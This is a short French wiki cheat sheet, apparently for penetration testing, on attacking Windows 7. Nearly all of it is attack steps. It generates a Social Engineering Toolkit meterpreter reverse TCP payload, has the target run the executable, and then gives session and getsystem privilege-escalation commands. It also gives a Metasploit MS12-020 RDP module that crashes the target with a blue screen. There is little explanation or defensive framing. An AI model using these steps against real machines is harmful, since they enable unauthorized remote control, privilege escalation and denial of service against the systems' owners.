Windows-seven-attack

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Attaque Windows 7
Vecteurs Payload SET (SET) + MS12-020 RDP
Outils setoolkit, meterpreter
Voir aussi Social Engineering Toolkit · UAC

Deux approches contre Windows 7 : un payload exécutable généré par le Social Engineering Toolkit pour obtenir une session meterpreter, et l'attaque en déni de service MS12-020 sur le RDP.

Payload via SET

Chemin : Exploitation tools / Social engineering tools / Social engineering toolkit / SET.

 4 - create a payload and listener
 IP : 192.168.0.x
 7 - windows meterpreter reverse TCP x64
 port : 443
 # payload généré : /pentest/exploits/set/msf.exe

Envoyer le fichier sur la machine cible et l'exécuter, puis :

sessions -l
sessions -i 1
getuid
sysinfo
# élévation de privilèges
getsystem
getuid
upload /root/root.txt c:/
cat root.txt

MS12-020 (RDP)

Attaque sur le protocole RDP. Le système cible doit avoir le RDP activé en mode « tout le monde peut se connecter ». Sur Seven SP1, provoque un crash (écran bleu) :

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.0.55
exploit

Voir aussi